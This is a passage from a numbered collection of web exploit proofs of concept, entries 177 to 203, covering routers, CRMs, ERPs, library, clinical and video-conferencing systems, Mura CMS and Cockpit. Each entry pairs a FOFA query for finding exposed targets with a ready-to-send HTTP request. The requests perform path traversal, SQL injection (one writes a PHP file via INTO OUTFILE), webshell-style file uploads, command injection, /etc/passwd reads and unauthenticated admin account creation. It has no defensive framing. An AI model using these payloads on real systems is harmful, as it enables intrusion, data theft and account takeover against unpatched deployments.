<?php system("cat /etc/passwd");unlink(__FILE__);?>
------WebKitFormBoundaryOKldnDPT
Content-Disposition: form-data; name="uploadtime"


------WebKitFormBoundaryOKldnDPT--

177. H3C router sensitive information disclosure

/userLogin.asp/../actionpolicy_status/../ER8300G2.cfg
/userLogin.asp/../actionpolicy_status/../M60.cfg
/userLogin.asp/../actionpolicy_status/../GR8300.cfg
/userLogin.asp/../actionpolicy_status/../GR5200.cfg
/userLogin.asp/../actionpolicy_status/../GR3200.cfg
/userLogin.asp/../actionpolicy_status/../GR2200.cfg
/userLogin.asp/../actionpolicy_status/../ER8300G2-X.cfg
/userLogin.asp/../actionpolicy_status/../ER8300G2.cfg
/userLogin.asp/../actionpolicy_status/../ER6300G2.cfg
/userLogin.asp/../actionpolicy_status/../ER5200G2.cfg
/userLogin.asp/../actionpolicy_status/../ER5200.cfg
/userLogin.asp/../actionpolicy_status/../ER5100.cfg
/userLogin.asp/../actionpolicy_status/../ER3260G2.cfg
/userLogin.asp/../actionpolicy_status/../ER3260.cfg
/userLogin.asp/../actionpolicy_status/../ER3200G2.cfg
/userLogin.asp/../actionpolicy_status/../ER3200.cfg
/userLogin.asp/../actionpolicy_status/../ER3108GW.cfg
/userLogin.asp/../actionpolicy_status/../ER3108G.cfg
/userLogin.asp/../actionpolicy_status/../ER3100G2.cfg
/userLogin.asp/../actionpolicy_status/../ER3100.cfg
/userLogin.asp/../actionpolicy_status/../ER2200G2.cfg

178. H3C campus network self-service system flexFileUpload arbitrary file upload
FOFA:header="/selfservice"

POST /imc/primepush/%2e%2e/flexFileUpload HTTP/1.1
Host:
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/89.0.4389.114 Safari/537.36
Content-Length: 252
Accept-Encoding: gzip, deflate
Connection: close
Content-Type: multipart/form-data; boundary=---------------aqutkea7vvanpqy3rh2l

-----------------aqutkea7vvanpqy3rh2l
Content-Disposition: form-data; name="12234.txt"; filename="12234"
Content-Type: application/octet-stream
Content-Length: 255

12234
-----------------aqutkea7vvanpqy3rh2l--

The uploaded file is then reachable with:
GET /imc/primepush/%2e%2e/flex/12234.txt

179. Jianwen (建文) engineering management system arbitrary file read

POST /Common/DownLoad2.aspx HTTP/1.1
Host: {{Hostname}}
Content-Type: application/x-www-form-urlencoded
User-Agent: Mozilla/5.0

path=../log4net.config&Name=

180. Bangguanke (帮管客) CRM jiliyu SQL injection
FOFA:app="帮管客-CRM"

GET /index.php/jiliyu?keyword=1&page=1&pai=id&sou=soufast&timedsc=激励语列表&xu=and%201=(updatexml(1,concat(0x7e,(select%20user()),0x7e),1)) HTTP/1.1
Host: your-ip
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/121.0.0.0 Safari/537.36
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
Accept-Encoding: gzip, deflate
Accept-Language: zh-CN,zh;q=0.9
Connection: close

181. Runshen (润申信息科技) enterprise standardization management system UpdataLogHandler.ashx SQL injection
FOFA:"PDCA/js/_publicCom.js"

POST /PDCA/ashx/UpdataLogHandler.ashx HTTP/1.1
Host: your-ip
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/123.0.0.0 Safari/537.36
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
Accept-Encoding: gzip, deflate, br
Accept-Language: zh-CN,zh;q=0.9
Connection: close
Content-Type: application/x-www-form-urlencoded

action=GetAll&start=' WAITFOR DELAY '0:0:5'--&end=&code=11&type=2&page=1&rows=20

182. Runshen (润申科技) enterprise standardization management system AddNewsHandler.ashx arbitrary user creation
FOFA:"PDCA/js/_publicCom.js"

POST /PDCA/ashx/AddNewsHandler.ashx?action=Adduser HTTP/1.1
Host: your-ip
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/123.0.0.0 Safari/537.36
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
Accept-Encoding: gzip, deflate, br
Accept-Language: zh-CN,zh;q=0.9
Connection: close
Content-Type: application/x-www-form-urlencoded

username=test1234&pwd=test1234&savedays=1

183. Guangzhou Tuchuang (图创) library cluster management system updOpuserPw SQL injection
FOFA:body="interlib/common/" || body="Interlib图书馆集群管理系统" || body="/interlib3/system_index" || body="打开Interlib主界面"

GET /interlib3/service/sysop/updOpuserPw?loginid=admin11&newpassword=Aa@123456&token=1%27and+ctxsys.drithsx.sn(1,(select%20111111*111111%20from%20dual))=%272 HTTP/1.1
Host: your-ip
User-Agent: Mozilla/5.0 (Linux; Android 11; motorola edge 20 fusion) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/101.0.4951.61 Mobile Safari/537.36
Accept-Charset: utf-8
Accept-Encoding: gzip, deflate
Connection: close

184. Xunrao (迅饶科技) X2Modbus gateway AddUser arbitrary user creation
FOFA:server="SunFull-Webs"

POST /soap/AddUser HTTP/1.1
Host: your-ip
Accept-Encoding: gzip, deflate
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:125.0) Gecko/20100101 Firefox/125.0
Accept: application/xml, text/xml, */*; q=0.01
Content-Type: text/xml; charset=utf-8
Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
X-Requested-With: XMLHttpRequest

insert into userid (USERNAME,PASSWORD,PURVIEW,LOGINDATE,LOGINTIME) values('root','123456','4','2024-5-6','11:7:56')

185. Realor (瑞友) Tianyi application virtualization system SQL injection
version < 7.0.5.1
FOFA:app="REALOR-天翼应用虚拟化系统"

GET /index.php?s=/Admin/appsave&appid=3%27%29%3Bselect+unhex%28%273c3f706870206563686f206d643528223122293b202466696c65203d205f5f46494c455f5f3b20756e6c696e6b282466696c65293b%27%29+into+outfile+%27.%5C%5C..%5C%5C..%5C%5CWebRoot%5C%5Cplom.xgi%27%23 HTTP/1.1
Host: host

186. F-logic DataCube3 SQL injection
CVE-2024-31750
F-logic DataCube3 is a compact terminal measurement system for photovoltaic power generation installations.
FOFA:title=="DataCube3"

POST /admin/pr_monitor/getting_index_data.php HTTP/1.1
Host: your-ip
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:124.0) Gecko/20100101 Firefox/124.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
Accept-Encoding: gzip, deflate
Connection: close
Content-Type: application/x-www-form-urlencoded

req_id=1) AND 1113=LIKE(CHAR(65,66,67,68,69,70,71),UPPER(HEX(RANDOMBLOB(500000000/2)))) AND (1450=1450

187. Mura CMS processAsyncObject SQL injection
CVE-2024-32640
FOFA:"Mura CMS"

POST /index.cfm/_api/json/v1/default/?method=processAsyncObject HTTP/1.1
Host: your-ip
Content-Type: application/x-www-form-urlencoded

object=displayregion&contenthistid=x%5c' AND (SELECT 3504 FROM (SELECT(SLEEP(5)))MQYa)-- Arrv&previewid=1

188. Santi Jiahui (叁体-佳会) video conferencing attachment arbitrary file read
version <= 3.9.7
FOFA:body="/system/get_rtc_user_defined_info?site_id"

GET /attachment?file=/etc/passwd HTTP/1.1
Host: your-ip
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/120.0.0.0 Safari/537.36
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
Accept-Encoding: gzip, deflate
Accept-Language: zh-CN,zh;q=0.9,en;q=0.8
Connection: close

189. Lanwon (蓝网科技) clinical browsing system deleteStudy SQL injection
FOFA:app="LANWON-临床浏览系统"

GET /xds/deleteStudy.php?documentUniqueId=1%27;WAITFOR%20DELAY%20%270:0:5%27-- HTTP/1.1
Host: your-ip
User-Agent: Mozilla/5.0 (Windows NT 6.3; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/107.0.0.0 Safari/537.36
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
Accept-Encoding: gzip, deflate
Accept-Language: zh-CN,zh;q=0.9
Connection: close

190. 短视频矩阵营销系统 poihuoqu arbitrary file read
FOFA:title=="短视频矩阵营销系统"
POST /index.php/admin/Userinfo/poihuoqu HTTP/2
Host: your-ip
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/101.0.4951.54 Safari/537.36
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.9
Content-Type: application/x-www-form-urlencoded
Accept-Encoding: gzip, deflate
Accept-Language: zh-CN,zh;q=0.9

poi=file:///etc/passwd

191. 亿赛通电子文档安全管理系统 NavigationAjax SQL injection
FOFA:body="/CDGServer3/index.jsp"
POST /CDGServer3/js/../NavigationAjax HTTP/1.1
Host: your-ip
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/70.0.3538.77 Safari/537.36
Content-Type: application/x-www-form-urlencoded

command=nav&id=1'waitfor delay '0:0:5'--+&name=&openId=

192. 富通天下外贸ERP UploadEmailAttr arbitrary file upload
FOFA:title="用户登录_富通天下外贸ERP"
POST /JoinfApp/EMail/UploadEmailAttr?name=.ashx HTTP/1.1
Host: your-ip
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36(KHTML, like Gecko) Chrome/93.0.4577.63 Safari/537.36
Content-Type: application/x-www-form-urlencoded

<% @ webhandler language="C#" class="AverageHandler" %>
using System;
using System.Web;
public class AverageHandler : IHttpHandler
{
    public bool IsReusable
    { get { return true; } }
    public void ProcessRequest(HttpContext ctx)
    {
        ctx.Response.Write("test");
    }
}

193. 山石网科云鉴安全管理系统 setsystemtimeaction command execution
FOFA:body="山石云鉴主机安全管理系统"
GET /master/ajaxActions/getTokenAction.php HTTP/1.1
Host:
Cookie: PHPSESSID=2333333333333;
Content-Type: application/x-www-form-urlencoded
User-Agent: Mozilla/5.0

POST /master/ajaxActions/setSystemTimeAction.php?token_csrf={{token}} HTTP/1.1
Host:
User-Agent: Mozilla/5.0
Accept-Encoding: gzip, deflate
Accept: */*
Connection: close
Cookie: PHPSESSID=2333333333333;
Content-Type: application/x-www-form-urlencoded
Content-Length: 84

param=os.system('echo 23333333333456 > /opt/var/majorsec/installation/master/runtime/img/config')

GET /master/img/config HTTP/1.1
Host:
User-Agent: Mozilla/5.0

194. 飞企互联-FE企业运营管理平台 uploadAttachmentServlet arbitrary file upload
FOFA:app="FE-协作平台"
If a request to /servlet/uploadAttachmentServlet returns a response, the vulnerability is present.

POST /servlet/uploadAttachmentServlet HTTP/1.1
Host: host
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/103.0.0.0 Safari/537.36
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
Accept-Encoding: gzip, deflate
Connection: close
Content-Type: multipart/form-data; boundary=----WebKitFormBoundaryKNt0t4vBe8cX9rZk

------WebKitFormBoundaryKNt0t4vBe8cX9rZk
Content-Disposition: form-data; name="uploadFile"; filename="../../../../../jboss/web/fe.war/hello.jsp"
Content-Type: text/plain

<% out.println("hello");%>
------WebKitFormBoundaryKNt0t4vBe8cX9rZk
Content-Disposition: form-data; name="json"

{"iq":{"query":{"UpdateType":"mail"}}}
------WebKitFormBoundaryKNt0t4vBe8cX9rZk--

195. 飞鱼星上网行为管理系统 send_order.cgi command execution
FOFA:title=="飞鱼星企业级智能上网行为管理系统"
POST /send_order.cgi?parameter=operation HTTP/1.1
Host: 127.0.0.1
Pragma: no-cache
Cache-Control: no-cache
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/122.0.0.0 Safari/537.36
Accept: */*
Accept-Encoding: gzip, deflate
Accept-Language: zh-CN,zh;q=0.9
Connection: close
Content-Type: application/x-www-form-urlencoded
Content-Length: 68

{"opid":"777777777777777777","name":";uname -a;echo ","type":"rest"}

196. 河南省风速科技统一认证平台 password reset
FOFA:body="/cas/themes/zbvc/js/jquery.min.js"
POST /cas/userCtl/resetPasswordBySuper HTTP/1.1
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/93.0.4577.63 Safari/537.36
Content-Type: application/json;charset=UTF-8
X-Requested-With: XMLHttpRequest
Host:
Accept: text/html, image/gif, image/jpeg, *; q=.2, */*; q=.2
Content-Length: 45
Connection: close

{"xgh":"test","newPass":"test666","email":""}

197. 浙大恩特客户资源管理系统 Quotegask_editAction SQL injection
FOFA:app="浙大恩特客户资源管理系统"
GET /entsoft/Quotegask_editAction.entweb;.js?goonumStr=1')+UNION+ALL+SELECT+111*111--+&method=goonumIsExist HTTP/1.1
Host:
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_8_4) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/49.0.2656.18 Safari/537.36
Accept-Encoding: gzip, deflate
Connection: close

198. 阿里云盘 WebDAV command injection
CVE-2024-29640
GET /cgi-bin/luci/admin/services/aliyundrive-webdav/query?sid=%60%6c%73%20%2f%3e%2f%77%77%77%2f%61%61%61%2e%74%78%74%60%20 HTTP/1.1
Cookie: sysauth=41273cb2cffef0bb5d0653592624cf64
Accept: */*
Accept-Encoding: gzip, deflate
Accept-Language: zh-CN,zh;q=0.9,en;q=0.8,en-GB;q=0.7,en-US;q=0.6
Connection: close

199. Cockpit assetsmanager_upload endpoint file upload

1. Run the PoC to obtain the CSRF token, then obtain the cookie, then upload and access the result:
GET /auth/login?to=/ HTTP/1.1

Response: 200, returned value: csfr:"eyJ0eXAi0iJKV1QiLCJhbGci0iJIUsI1NiJ9.eyJjc2ZyIjoibG9naW4ifQ.6KvuRJo3-Dp2UouwGH9D8cmnXEL4NGNen9CX3ex86cw"

2. Use the JWT obtained in the previous step to get a cookie:

POST /auth/check HTTP/1.1
Content-Type: application/json

{"auth":{"user":"admin","password":"admin"},"csfr":"eyJ0eXAi0iJKV1QiLCJhbGci0iJIUsI1NiJ9.eyJjc2ZyIjoibG9naW4ifQ.6KvuRJo3-Dp2UouwGH9D8cmnXEL4NGNen9CX3ex86cw"}

Response: 200, returned value:
Set-Cookie:mysession=95524f01e238bf51bb60d77ede3bea92: path=/
Fofa:title="Authenticate Please!"
POST /assetsmanager/upload HTTP/1.1
Content-Type: multipart/form-data; boundary=---------------------------36D28FBc36bd6feE7Fb3
Cookie: mysession=95524f01e238bf51bb60d77ede3bea92

-----------------------------36D28FBc36bd6feE7Fb3
Content-Disposition: form-data; name="files[]"; filename="tttt.php"
Content-Type: text/php

<?php echo "tttt";unlink(__FILE__);?>
-----------------------------36D28FBc36bd6feE7Fb3
Content-Disposition: form-data; name="folder"

-----------------------------36D28FBc36bd6feE7Fb3--

/storage/uploads/tttt.php

200. SeaCMS 海洋影视管理系统 dmku SQL injection
FOFA:app="海洋CMS"
GET /js/player/dmplayer/dmku/?ac=del&id=(select(0)from(select(sleep(5)))v)&type=list HTTP/1.1
Cookie: PHPSESSID=hlfl5flck9q3ng1blehhv86s4s
Upgrade-Insecure-Requests: 1
Cache-Control: max-age=0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
Accept-Encoding: gzip, deflate
Accept-Language: zh-CN,zh;q=0.9

201. 方正全媒体新闻采编系统 binary SQL injection
FOFA:body="/newsedit/newsedit/" || app="FOUNDER-全媒体采编系统"
POST /newsedit/newsplan/task/binary.do HTTP/1.1
Content-Type: application/x-www-form-urlencoded
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
Accept-Encoding: gzip, deflate
Accept-Language: zh-CN,zh;q=0.9
Connection: close

TableName=DOM_IMAGE+where+REFID%3D-1+union+select+%271%27%3B+WAITFOR+DELAY+%270%3A0%3A5%27%3Bselect+DOM_IMAGE+from+IMG_LARGE_PATH&FieldName=IMG_LARGE_PATH&KeyName=REFID&KeyID=1

202. 微擎系统 AccountEdit arbitrary file upload
FOFA:body="/Widgets/WidgetCollection/"
Obtain the __VIEWSTATE and __EVENTVALIDATION values:
GET /User/AccountEdit.aspx HTTP/1.1
Host: 滑板人之家
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/531.36 (KHTML, like Gecko) Chrome/83.0.4103.112 Safari/537.31
Content-Length: 0

Replace the __VIEWSTATE and __EVENTVALIDATION values in the request below:
POST /User/AccountEdit.aspx HTTP/1.1
Accept-Encoding: gzip, deflate, br
Content-Type: multipart/form-data;boundary=---------------------------786435874t38587593865736587346567358735687

-----------------------------786435874t38587593865736587346567358735687
Content-Disposition: form-data; name="__VIEWSTATE"

__VIEWSTATE
-----------------------------786435874t38587593865736587346567358735687
Content-Disposition: form-data; name="__EVENTVALIDATION"

__EVENTVALIDATION
-----------------------------786435874t38587593865736587346567358735687
Content-Disposition: form-data; name="ctl00$MyContentPlaceHolder$ctl00$upload"; filename="1123.txt"
Content-Type: text/plain

Hello World!
-----------------------------786435874t38587593865736587346567358735687
Content-Disposition: form-data; name="ctl00$MyContentPlaceHolder$ctl00$bttnUpload"

上传图片
-----------------------------786435874t38587593865736587346567358735687
Content-Disposition: form-data; name="ctl00$MyContentPlaceHolder$ctl00$txtLastName"


-----------------------------786435874t38587593865736587346567358735687
Content-Disposition: form-data; name="ctl00$MyContentPlaceHolder$ctl00$txtEmail"


-----------------------------786435874t38587593865736587346567358735687--

/_data/Uploads/1123.txt

203. 红海云EHR PtFjk file upload
FOFA:body="RedseaPlatform"
POST /RedseaPlatform/PtFjk.mob?method=upload HTTP/1.1
Host: x.x.x.x
Accept-Encoding: gzip
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_14_3) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/12.0.3 Safari/605.1.15
Content-Type: multipart/form-data; boundary=----WebKitFormBoundaryt7WbDl1tXogoZys4
Content-Length: 210

------WebKitFormBoundaryt7WbDl1tXogoZys4
Content-Disposition: form-data; name="fj_file"; filename="11.jsp"
Content-Type: image/jpeg

<% out.print("hello,eHR");%>
------WebKitFormBoundaryt7WbDl1tXogoZys4--